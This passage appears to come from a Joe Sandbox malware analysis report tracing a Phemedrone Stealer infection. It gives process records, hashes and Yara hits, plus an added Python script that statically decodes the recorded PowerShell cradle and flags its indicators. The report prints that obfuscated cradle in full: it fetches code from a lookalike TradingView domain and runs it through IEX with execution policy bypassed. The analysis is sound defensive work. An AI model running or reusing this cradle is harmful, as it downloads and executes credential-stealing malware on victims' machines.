                                                          Imagebase:0x7ff6eb350000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true
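
Target IDs 3, 5, 6 and 8 are one action seen through three layers of cmd.exe: `cmd.exe /c "cmd.exe /c start /min cmd /c powershell ..."`, with `start /min` keeping the console window out of sight and `-NoP -NonI -ExecutionPolicy Bypass` making PowerShell run the command regardless of profile or policy. The download URL never appears as one string in the command line; it is assembled from five fragments, and the assembled value is `https://apitradingview.com/ermando1.txt`: `'api'` followed by `'tradingview.com/'` has no dot between them, so this is a separate domain that merely resembles api.tradingview.com, fetched with a custom User-Agent of `TradingView` and executed in memory by `IEX`. The following is an added example, not code from the report or from Joe Security: it statically evaluates the literal assignments and `+` concatenations in such a command line (without running any PowerShell), recovers the URL and User-Agent actually passed to `Invoke-WebRequest`, and flags the switch and cmdlet combination that makes a download cradle. The command line is the one recorded for Target ID 8; the indicator names and the `is_download_cradle` verdict are this example's own.

```python
import re
from urllib.parse import urlparse

# Command line as recorded for Target ID 8 in this report (cmd.exe wrappers already stripped).
CRADLE = (
    "powershell -NoP -NonI -ExecutionPolicy Bypass -Command \"$AI='https://'; $mode='api'; "
    "$update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; "
    "$charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; "
    "$Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; "
    "$Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script\""
)

# One PowerShell statement of the form $name='literal' or $name=$a+$b+...
STATEMENT = re.compile(
    r"\$(?P<name>\w+)\s*=\s*(?:'(?P<lit>[^']*)'|(?P<cat>\$\w+(?:\s*\+\s*\$\w+)+))"
)

# Switches and cmdlets that, in combination, make up a download-and-execute cradle
# (indicator names are this example's own).
INDICATORS = {
    "execution_policy_bypass": re.compile(r"-E\w*\s+Bypass", re.I),
    "no_profile": re.compile(r"-NoP\w*", re.I),
    "non_interactive": re.compile(r"-NonI\w*", re.I),
    "web_download": re.compile(r"Invoke-WebRequest|\biwr\b|DownloadString|Net\.WebClient", re.I),
    "invoke_expression": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
}


def resolve_variables(cmdline):
    """Evaluate single-quoted literals and '+' concatenations of already-known variables,
    in source order, without executing anything. Unknown expressions are left unresolved."""
    env = {}
    for m in STATEMENT.finditer(cmdline):
        if m.group("lit") is not None:
            env[m.group("name")] = m.group("lit")
        else:
            parts = re.findall(r"\$(\w+)", m.group("cat"))
            if all(p in env for p in parts):
                env[m.group("name")] = "".join(env[p] for p in parts)
    return env


def argument_value(cmdline, switch, env):
    """Resolve the value given to a cmdlet switch such as -Uri or -UserAgent,
    whether it is written as a literal or as a variable assembled earlier."""
    m = re.search(re.escape(switch) + r"\s+(?:\$(\w+)|'([^']*)')", cmdline, re.I)
    if not m:
        return None
    return env.get(m.group(1)) if m.group(1) else m.group(2)


def analyze(cmdline):
    env = resolve_variables(cmdline)
    uri = argument_value(cmdline, "-Uri", env)
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(cmdline))
    return {
        "uri": uri,
        "host": urlparse(uri).hostname if uri else None,
        "user_agent": argument_value(cmdline, "-UserAgent", env),
        "indicators": hits,
        # download plus in-memory execution is the cradle; the bypass switches are supporting evidence
        "is_download_cradle": "web_download" in hits and "invoke_expression" in hits,
    }


if __name__ == "__main__":
    for key, value in analyze(CRADLE).items():
        print(f"{key}: {value}")
```

The resolved host and User-Agent are the pivots to hunt with: any endpoint fetching from `apitradingview.com`, or sending `User-Agent: TradingView` to anything, is worth a look even when the command line was logged in a different fragment order. The script fetched by the cradle is not in this report; the next observable is Target ID 10, WDSecureUtilities_548.exe, started six seconds later from AppData\Roaming with `-pkek -aoa -y`, switches consistent with a 7-Zip self-extractor (password, overwrite all, assume yes), which is where the Yara hits for Phemedrone Stealer land.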

                                                          Target ID:9
                                                          Start time:03:38:53
                                                          Start date:04/11/2024
                                                          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                          Imagebase:0x7ff6220e0000
                                                          File size:496'640 bytes
                                                          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                          Has elevated privileges:true
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:false

                                                          Target ID:10
                                                          Start time:03:38:57
                                                          Start date:04/11/2024
                                                          Path:C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe" -pkek -aoa -y
                                                          Imagebase:0x2545cab0000
                                                          File size:252'416 bytes
                                                          MD5 hash:BCB323EB0CFD10D58CF134BC7BDC8D67
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_PhemedroneStealer, Description: Yara detected Phemedrone Stealer, Source: 0000000A.00000002.1515907713.000002545E8BB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_GenericStealer_9, Description: Yara detected Generic Stealer, Source: 0000000A.00000002.1515907713.000002545E8BB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_PhemedroneStealer, Description: Yara detected Phemedrone Stealer, Source: 0000000A.00000002.1515907713.000002545E8D6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_PhemedroneStealer, Description: Yara detected Phemedrone Stealer, Source: 0000000A.00000002.1515907713.000002545EC7A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_PhemedroneStealer, Description: Yara detected Phemedrone Stealer, Source: 0000000A.00000002.1515907713.000002545EAC7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_PhemedroneStealer, Description: Yara detected Phemedrone Stealer, Source: 0000000A.00000002.1515907713.000002545EAF2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          Antivirus matches:
                                                          • Detection: 100%, Joe Sandbox ML
                                                          • Detection: 79%, ReversingLabs
                                                          Reputation:low
                                                          Has exited:true

                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.1624743941.00007FFE7DEAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DEAD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffe7dead000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 10f21a21965bd48e4ee614db2709b3312a45a9b6c36d5277c2c27e2e4c5ac9ff
                                                            • Instruction ID: bbf9e21266f7fbd503f21dfdc539a406d8c9c12a769eabef28950f8d1160b8fd
                                                            • Opcode Fuzzy Hash: 10f21a21965bd48e4ee614db2709b3312a45a9b6c36d5277c2c27e2e4c5ac9ff
                                                            • Instruction Fuzzy Hash: 8411913150CF088F9BA8EF1DE48596237E0FB98321B10065FE459C7666D731F881CB82
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.1625378113.00007FFE7DFC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DFC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffe7dfc0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                            • Instruction ID: 82df834b79a4cc6a8b0a21f00b4947252c11fc1bb5b8517047c4faf708f1f59a
                                                            • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                            • Instruction Fuzzy Hash: 0601677111CB0C4FD758EF0CE451AA5B7E0FB95364F10066EE58AC3661DA36E892CB45
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.1625971106.00007FFE7E090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E090000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffe7e090000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: de9f8c43a487510be07df9fdd6e369d65e70c3bbee38d378eb42071baf1fa416
                                                            • Instruction ID: 3577fabf5b512f5f959e7b72f1eb52b6f1cd2bcec203346c273090c54e8a7b7c
                                                            • Opcode Fuzzy Hash: de9f8c43a487510be07df9fdd6e369d65e70c3bbee38d378eb42071baf1fa416
                                                            • Instruction Fuzzy Hash: 0BF05E32A1C5858FD7A4EB1CE4828A873E1EF4532471900B7D15DC7477DA2AAC418740
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.1625971106.00007FFE7E090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E090000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffe7e090000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 80fdee6ce009377f5297da82cbfeb0ca1175c1f64f33883fc514f8185eeec0e5
                                                            • Instruction ID: dcd7fa51c9fb6e606031d45ae1e5ba867057864f7ce3f72f53c50053afb95d03
                                                            • Opcode Fuzzy Hash: 80fdee6ce009377f5297da82cbfeb0ca1175c1f64f33883fc514f8185eeec0e5
                                                            • Instruction Fuzzy Hash: E9F05E32A0C5458FD6A9EB1CE4454A877E1EF4632471600B7D15AC7473DA2AEC418740
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.1625971106.00007FFE7E090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E090000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffe7e090000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a5d145cdc09163d38ecd44dec47bda9339480721f0d1c44efb500562f4ec0046
                                                            • Instruction ID: 7c6e63ff89ffc1abe9125907ea45d63b3bf73de8bfe2b0d674de791073c9f0bc
                                                            • Opcode Fuzzy Hash: a5d145cdc09163d38ecd44dec47bda9339480721f0d1c44efb500562f4ec0046
                                                            • Instruction Fuzzy Hash: A1F08C32A1C5588FD7A4EB5CE4818A877E0EF06320B0A00F7D19ACB473EA7AEC44C740
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.1625971106.00007FFE7E090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E090000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffe7e090000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1a5e37a7b1eb3ce7972ac800982b35705d24b7d8c24f95b3043d8e78f2ba3ae9
                                                            • Instruction ID: e7f9f506f9ad5a0a6b99ce2fc2a4b03a90dc8f469bd6313349e15c84f754a6d3
                                                            • Opcode Fuzzy Hash: 1a5e37a7b1eb3ce7972ac800982b35705d24b7d8c24f95b3043d8e78f2ba3ae9
                                                            • Instruction Fuzzy Hash: BAE05B32708D58CF9754DA5CE4895D9B7E1FF5C2613140177D54DC7231DA20D892C780

                                                            Execution Graph

                                                            Execution Coverage:10.9%
                                                            Dynamic/Decrypted Code Coverage:100%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:9
                                                            Total number of Limit Nodes:0
                                                            execution_graph 2331 7ffe7dfc794a 2333 7ffe7dfe0960 CreateFileW 2331->2333 2334 7ffe7dfe0a2e 2333->2334 2335 7ffe7dfc795a 2336 7ffe7dfe0bd0 SetFileInformationByHandle 2335->2336 2338 7ffe7dfe0c67 2336->2338 2339 7ffe7dfc8032 2340 7ffe7dfc8035 LoadLibraryA 2339->2340 2342 7ffe7dfd43ef 2340->2342

                                                            Control-flow Graph

                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.1528627716.00007FFE7DFC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DFC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_7ffe7dfc0000_WDSecureUtilities_548.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f4e9ac10beecea3d54e761a7191ecea6e3a4afc1bc599aa07fa98ce3693065cc
                                                            • Instruction ID: 7e6d107e8bf26b9579d9f33cd4ac140366d110499ab5b0c4ee48c13a9055eba4
                                                            • Opcode Fuzzy Hash: f4e9ac10beecea3d54e761a7191ecea6e3a4afc1bc599aa07fa98ce3693065cc
                                                            • Instruction Fuzzy Hash: 9B81F432A1898D4FEB68EF2CD8567F93BD0FF55355F04427BD45DC32A2EA24A8418B81

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 24 7ffe7dfc794a-7ffe7dfe09c3 28 7ffe7dfe09cd-7ffe7dfe0a2c CreateFileW 24->28 29 7ffe7dfe09c5-7ffe7dfe09ca 24->29 30 7ffe7dfe0a34-7ffe7dfe0a5c 28->30 31 7ffe7dfe0a2e 28->31 29->28 31->30
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.1528627716.00007FFE7DFC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DFC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_7ffe7dfc0000_WDSecureUtilities_548.jbxd
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: 3bc59816bb548607194e092645cf9060dd2d8d6806ece3f813b08b5ec633845a
                                                            • Instruction ID: bb01ac0c937e8a8c5c3a50b913706989a66608f6afff9420b52c638d89841557
                                                            • Opcode Fuzzy Hash: 3bc59816bb548607194e092645cf9060dd2d8d6806ece3f813b08b5ec633845a
                                                            • Instruction Fuzzy Hash: D231A23191CA5C9FDB58EF58D849AFD7BE0FB69321F04422EE049E3251DB70A8028BC1

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 33 7ffe7dfc795a-7ffe7dfe0c65 SetFileInformationByHandle 37 7ffe7dfe0c6d-7ffe7dfe0c9c 33->37 38 7ffe7dfe0c67 33->38 38->37
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.1528627716.00007FFE7DFC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DFC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_7ffe7dfc0000_WDSecureUtilities_548.jbxd
                                                            Similarity
                                                            • API ID: FileHandleInformation
                                                            • String ID:
                                                            • API String ID: 3935143524-0
                                                            • Opcode ID: cda5d06844b419ed440f4c5331a8800bcb3b2c18c3f0b568eca685bc8b47f7c4
                                                            • Instruction ID: 134795cafa601c932c704fe4b2cc340c3a873ec92d3dd9ca830881338a1f60a9
                                                            • Opcode Fuzzy Hash: cda5d06844b419ed440f4c5331a8800bcb3b2c18c3f0b568eca685bc8b47f7c4
                                                            • Instruction Fuzzy Hash: 0521D73191CA0C8FDB1CDB5CD8466F977E4EB69321F00423ED04ED3652DB64A846CB81